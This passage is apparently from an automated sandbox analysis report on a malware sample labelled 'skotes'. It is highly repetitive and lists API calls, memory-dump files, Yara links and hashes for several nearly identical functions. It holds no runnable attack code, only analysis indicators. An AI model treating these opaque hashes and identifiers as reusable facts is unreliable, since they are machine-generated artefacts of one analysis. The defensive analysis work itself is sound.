                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2383c3174392d48a56eec9a8557e61e0a47b57f86f0dcd1fec4ca75620d9e70b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A312731B102409BEF089BBCCD89BADB7ABEB86314F20421CE01497BD5C77699808796
                                                                                                                                                                                                                                          Function 0069A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A1B1
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 80f2b0e135afb1192687d5d06332ea41b345f7f9a8eaa5a88ed8bef0ac3b3cb0
                                                                                                                                                                                                                                          • Instruction ID: 264894f3b2a2b3428b6d4b9c7d78baf3ba2cf510bc0d4219b409db424ee335a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80f2b0e135afb1192687d5d06332ea41b345f7f9a8eaa5a88ed8bef0ac3b3cb0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1312931B102409BEF089BBCDD8D76DB7B7EB86310F24421CE0149BBD5C7754A808796
                                                                                                                                                                                                                                          Function 0069A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A2E6
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 6239fc69d2f8d5dbae8d7f873dbf16cbdb6924e5ef6bf44c3a740f992ddfb3dc
                                                                                                                                                                                                                                          • Instruction ID: 230d2f4b7e8e1296df3463a0277e18e21e31691f439cd7b2c1cde5885ba63449
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6239fc69d2f8d5dbae8d7f873dbf16cbdb6924e5ef6bf44c3a740f992ddfb3dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB312831B102409BEF189BBCDC8976DB7BBEB86310F24421CE415DBBD5C77699808792
                                                                                                                                                                                                                                          Function 0069A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A41B
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: c74f87f6d3886ff83c75ec79fcb64848486a20cc2258bacd3abb744f701a3e4c
                                                                                                                                                                                                                                          • Instruction ID: 761074bd5a7ed0a72618d309932263fb1dfca460b23ca0df0f151688635ea9c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74f87f6d3886ff83c75ec79fcb64848486a20cc2258bacd3abb744f701a3e4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA311731B502009BEF08ABBCDD8DB6DB6EBEB86310F20421CE0549BBD5D77589808696
                                                                                                                                                                                                                                          Function 0069A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A550
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
